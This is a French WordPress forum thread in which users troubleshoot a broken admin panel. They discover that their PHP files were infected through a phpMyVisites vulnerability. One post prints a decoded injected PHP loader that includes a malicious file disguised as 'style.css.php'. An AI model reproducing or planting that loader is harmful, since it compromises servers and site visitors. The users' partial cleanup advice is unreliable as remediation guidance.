Bug d’affichage de l’interface d’admin (Créer un compte)

  • Statut : non résolu
15 sujets de 1 à 15 (sur un total de 19)
  • Auteur
    Messages
  • #476948
    danymi
    Participant
    Initié WordPress
    41 contributions

    Bonjour,

    Ma configuration WP actuelle
    – Version de WordPress : 2.8.6 FR
    – Thème utilisé : branford magazine
    – Extensions en place : Advanced Random Posts, advanced spoiler, All in One SEO Pack, Breadcrumb NavXT, Contact Form 7, Extended Category Widget, Featured Content Gallery , Google XML Sitemaps, Random Text, WP-PageNavi
    – Nom de l’hebergeur : 1&1
    Problème(s) rencontré(s) :

    Mon interface d’admin ressemble désormais à ça !
    interfacewordpress.gif

    Je précise que tout fonctionnait très bien avec les extensions citées, le problème est apparu brutalement sans que j’ai ajouté ou modifié quoi que ce soit.

    Quelqu’un a une idée ?

    Merci d’avance

    #704705
    Lumiere de Lune
    Participant
    Maître WordPress
    20531 contributions

    Es tu en php5 ?

    Si oui, je dirais bien « recharge les fichiers de base de wordpress »

    #704706
    danymi
    Participant
    Initié WordPress
    41 contributions
    Lumière de Lune wrote:
    Es tu en php5 ?

    Si oui, je dirais bien « recharge les fichiers de base de wordpress »

    C’est à dire ? Rebalancer par FTP tous les fichiers de WP ? exception faite wp-config, theme, plugins ? Sinon oui je suis en php5 via .htaccess

    #704707
    Lumiere de Lune
    Participant
    Maître WordPress
    20531 contributions

    Oui, relancer tous les fichiers par ftp, il se peut qu’il y en ai un qui soit mal passé.

    #704708
    danymi
    Participant
    Initié WordPress
    41 contributions

    Hélas non, rien à voir…
    J’ai fait la manipulation et ça ne change rien…
    De plus, j’ai 2 site hénergés chez 1&1 et je viens de me rendre compte que l’autre le fait aussi….
    Galere…d’ou cela pourrait-il venir que je les en informe ?

    #704709
    justsev
    Membre
    Initié WordPress
    4 contributions

    Hello
    j’ai eu le même problème que toi hier
    Toutes mes pages php sans exception même en dehors de mon wordpress.
    Dans toutes les pages j’avais un truc comme ça tout en haut avant le premier <?php

    j’ai été à cette adresse le décoder
    http://www.opinionatedgeek.com/DotNet/Tools/Base64Decode/default.aspx

    if(function_exists(‘ob_start’)&&!isset($GLOBALS)){$GLOBALS=’/home/sev/public_html/im/wp-content/plugins/search-unleashed/engines/Zend/Search/Lucene/Analysis/Analyzer/Common/Text/style.css.php’;if(file_exists($GLOBALS)){include_once($GLOBALS);if(function_exists(‘gml’)&&function_exists(‘dgobh’)){ob_start(‘dgobh’);}}}

    et je vois que ça vient de mon plugin search-unleashed
    je l’ai supprimé donc .. au cas ou et j’ai ré_uploadé toutes mes pages.

    Regarde si tu as ce genre de chose toi aussi … mais pour moi ça vient de là.
    bon courage
    sev

    #704710
    danymi
    Participant
    Initié WordPress
    41 contributions

    Non je n’ai pas ce genre de message…en revanche, j’ai ça de manière complètement aléatoire

    Warning: gzinflate() [function.gzinflate]: data error in /homepages/10/d232374261/htdocs/wp-includes/http.php on line 1788

    Warning: gzuncompress() [function.gzuncompress]: data error in /homepages/10/d232374261/htdocs/wp-includes/http.php on line 1793

    #704711
    justsev
    Membre
    Initié WordPress
    4 contributions

    oui j’avais aussi le même message … c’est les fichiers .js qui permettent de compresser ton menu dans le dashboard qui ne sont pas trouvés.
    moi ça me le faisait tant que je supprimais pas juste devant la première balise  » <?php" le fameux code qui s'est ajouté partout.
    je crois que c’est après avoir ré – uploadé le dossier wp-includes que mon tableau de bord a fonctionné à la normal ..

    télécharge une de tes page php par ftp ouvre là avec le bloc-note et regarde quand même
    même mon thème avait été touché mais par contre ça fonctionnait nickel .. on ne se serait pas douté.

    sev

    #704712
    Cri-cri
    Membre
    Initié WordPress
    3 contributions

    J’ai eu exactement le même problème !
    Quand je veux me connecter à l’admin de wordpress, j’ai une erreur 500 qui persiste depuis un petit moment. J’ai eu en même temps des erreurs de php sur d’autres pages.
    Et c’est là que je me suis aperçu du code rajouté sur toutes mes pages php, et toutes modifiées au même moment !

    Pour ma part, ce serait un autre plugin (…wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php) qui serait en cause !

    Le site est hébergé chez 1&1. Mes fichiers sont en 644. Je suis vraiment curieux de savoir d’où ça vient et comment éviter que cela ne recommence !

    #704713
    justsev
    Membre
    Initié WordPress
    4 contributions

    Hello,
    J’ai vraiment aucune idée d’ou cela peut provenir.. effectivement je m’en suis rendu compte comme ça aussi…toutes mes pages avaient été changées en même temps alors que je n’y avait pas touché depuis plus de 3 jours.

    Pour info je suis pas hébergé chez 1&1 mais j’ai mon nom de domaine chez eux.

    #704714
    danymi
    Participant
    Initié WordPress
    41 contributions

    Bonjour,

    Finalement, j’ai uploadé tous les fichiers .js dans chaque répertoire de WP et tout est redevenu normal. Alors d’où ça vient et pourquoi cela surgit de cette manière…mystère….

    #704715
    McPeter
    Membre
    Initié WordPress
    2 contributions

    Un de mes clients rencontre le me problème … sur un site de type *from scratch* .. et ce sur deux de ses sites … point comun aux deux sites : le script phpMyVisit installé par le client :
    Vous utiliseriez pas ce truc vous aussi ? ou un service de ce genre ?

    #704716
    McPeter
    Membre
    Initié WordPress
    2 contributions

    et comme par hasard mon client m’annonce ce soir :

    You are receiving this email from phpMyVisites (php web analytics) because you have downloaded the product, registered for the newsletter or participated in the forums.
    The phpMyVisites team announces the immediate availability of phpMyVisites
    2.4 which addresses a *critical* security issue in versions greater than 2.3b3. There are automatic attacks running on Russian servers that are infecting phpMyVisites installations. When infected, a php shell is installed on the server which can give total server control to the attacker.
    All phpMyVisites users are *urged* to update their existing phpMyVisites to the 2.4 release. Please find more information about the issue on the official
    website: http://www.phpmyvisites.us
    We will not be releasing any further phpMyVisites versions after 2.4. The team has been working over the last two years on a new and improved project, Piwik, which aims to be an open source alternative to Google Analytics.
    Piwik is evolving rapidly and now has more than 30,000 users in more than 33 languages! New features are added every month. We recommend that you start using Piwik as a replacement for phpMyVisites for your web analytics

    **super**

    #704717
    Lumiere de Lune
    Participant
    Maître WordPress
    20531 contributions

    En plus phpmyvisit, je n’ai jamais réussi à vraiment le faire fonctionner, trop gourmand en ressources dès qu’on a un peu d’historique…(et Piwik pareil)

    #704718
    danymi
    Participant
    Initié WordPress
    41 contributions

    Bonjour,

    Je confirme que j’utilise bien PhpMyVisites sur mes 2 sites et j’ai aussi reçu ce message …pour l’instant je n’ai rien fait la dessus. Comme je le disais, le fait d’uploader les .Js a suffit a remettre mon interface en ordre.

15 sujets de 1 à 15 (sur un total de 19)
  • Vous devez être connecté pour répondre à ce sujet.